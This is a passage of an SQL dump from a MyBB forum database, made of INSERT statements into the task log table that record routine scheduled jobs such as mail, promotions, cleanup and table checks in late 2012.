`mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13559', '7', '1351540823', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13560', '5', '1351541145', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13561', '9', '1351541495', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13562', '5', '1351542368', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13563', '9', '1351542372', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13564', '3', '1351542630', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13565', '9', '1351543349', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13566', '5', '1351543627', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13567', '9', '1351544155', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13568', '3', '1351545060', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13569', '1', '1351545073', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13570', '7', '1351545081', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13571', '5', '1351545113', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13572', '9', '1351545131', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13573', '5', '1351545942', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13574', '9', '1351547272', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13575', '3', '1351547337', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13576', '5', '1351547346', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13577', '9', '1351548257', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13578', '3', '1351548264', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13579', '1', '1351548269', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13580', '7', '1351548281', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13581', '5', '1351548319', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13582', '9', '1351548758', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13583', '5', '1351549515', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13584', '9', '1351549875', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13585', '3', '1351549899', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13586', '9', '1351550454', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13587', '5', '1351551447', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13588', '9', '1351551482', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13589', '3', '1351551778', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13590', '1', '1351552165', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13591', '7', '1351552178', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13592', '5', '1351552188', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13593', '9', '1351552227', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13594', '5', '1351553819', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13595', '9', '1351553900', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13596', '3', '1351553942', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13597', '9', '1351554285', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13598', '5', '1351554387', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13599', '9', '1351555654', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13600', '3', '1351555672', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13601', '1', '1351555715', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13602', '2', '1351555800', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13603', '7', '1351555886', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13604', '11', '1351555900', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13605', '5', '1351556177', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13606', '9', '1351557410', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13607', '5', '1351558032', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13608', '3', '1351558035', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13609', '9', '1351558049', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13610', '9', '1351559208', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13611', '3', '1351559255', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13612', '1', '1351559260', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13613', '7', '1351559294', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13614', '5', '1351559299', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13615', '9', '1351559430', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13616', '5', '1351560304', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13617', '9', '1351560307', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13618', '3', '1351560823', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13619', '9', '1351562354', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13620', '5', '1351562395', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13621', '3', '1351562435', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13622', '1', '1351562441', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13623', '7', '1351562444', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13624', '5', '1351563958', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13625', '9', '1351563984', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13626', '3', '1351564533', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13627', '9', '1351565542', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13628', '5', '1351565546', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13629', '9', '1351565884', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13630', '3', '1351566173', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13631', '1', '1351566194', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13632', '7', '1351566268', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13633', '5', '1351568230', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13634', '9', '1351568274', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13635', '3', '1351568988', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13636', '9', '1351570405', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13637', '5', '1351570431', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13638', '3', '1351570492', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13639', '1', '1351570522', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13640', '7', '1351570527', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13641', '5', '1351571212', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13642', '9', '1351571217', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13643', '3', '1351571486', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13644', '9', '1351572543', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13645', '5', '1351572545', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13646', '9', '1351573132', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13647', '3', '1351573178', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13648', '1', '1351573238', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13649', '7', '1351573266', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13650', '5', '1351573503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13651', '9', '1351574417', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13652', '5', '1351574704', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13653', '9', '1351574738', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13654', '3', '1351576446', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13655', '9', '1351578058', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13656', '5', '1351578069', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13657', '3', '1351578071', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13658', '1', '1351578074', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13659', '7', '1351578079', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13660', '5', '1351578407', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13661', '9', '1351578520', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13662', '3', '1351581486', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13663', '9', '1351581648', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13664', '5', '1351582649', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13665', '1', '1351582661', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13666', '7', '1351582726', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13667', '9', '1351582803', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13668', '3', '1351582838', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13669', '5', '1351588104', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13670', '9', '1351588142', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13671', '3', '1351588154', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13672', '1', '1351588169', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13673', '7', '1351588195', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13674', '9', '1351590081', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13675', '5', '1351590245', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13676', '3', '1351590249', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13677', '5', '1351590399', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13678', '9', '1351595105', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13679', '3', '1351595136', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13680', '1', '1351595168', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13681', '7', '1351595396', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13682', '5', '1351595404', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13683', '9', '1351595664', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13684', '5', '1351596485', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13685', '9', '1351596501', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13686', '3', '1351596609', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13687', '9', '1351597336', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13688', '5', '1351598928', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13689', '9', '1351598952', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13690', '3', '1351598958', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13691', '1', '1351598968', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13692', '4', '1351598971', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13693', '7', '1351599014', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13694', '9', '1351599119', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13695', '5', '1351601326', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13696', '9', '1351601486', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13697', '3', '1351601536', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13698', '9', '1351601953', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13699', '3', '1351602159', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13700', '1', '1351602165', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13701', '7', '1351602499', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13702', '5', '1351604394', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13703', '9', '1351604453', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13704', '3', '1351604463', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13705', '5', '1351604848', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13706', '9', '1351605416', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13707', '3', '1351605679', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13708', '1', '1351605683', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13709', '7', '1351605690', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13710', '5', '1351605953', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13711', '9', '1351608548', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13712', '5', '1351608745', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13713', '3', '1351608828', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13714', '9', '1351608936', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13715', '3', '1351610537', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13716', '1', '1351610545', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13717', '7', '1351610549', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13718', '5', '1351610559', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13719', '9', '1351611148', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13720', '5', '1351611646', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13721', '3', '1351611679', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13722', '9', '1351611735', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13723', '5', '1351611965', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13724', '9', '1351612544', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13725', '3', '1351612828', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13726', '1', '1351612834', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13727', '7', '1351612838', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13728', '5', '1351613311', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13729', '9', '1351613468', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13730', '5', '1351614466', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13731', '9', '1351614488', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13732', '3', '1351614739', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13733', '9', '1351615673', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13734', '5', '1351615684', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13735', '9', '1351616386', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13736', '3', '1351616994', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13737', '1', '1351617011', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13738', '7', '1351617015', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13739', '5', '1351617320', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13740', '9', '1351617774', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13741', '5', '1351617901', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13742', '9', '1351617916', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13743', '3', '1351618351', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13744', '9', '1351619021', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13745', '5', '1351619847', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13746', '9', '1351619873', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13747', '3', '1351619968', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13748', '1', '1351620006', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13749', '7', '1351620014', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13750', '5', '1351620301', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13751', '9', '1351620919', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13752', '5', '1351621548', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13753', '9', '1351621559', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13754', '3', '1351621812', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13755', '9', '1351622480', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13756', '5', '1351622700', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13757', '9', '1351623345', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13758', '3', '1351623710', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13759', '1', '1351623711', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13760', '7', '1351623785', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13761', '5', '1351624538', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13762', '9', '1351624568', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13763', '5', '1351625577', 'The promotions task successfully ran.'); INSERT INTO 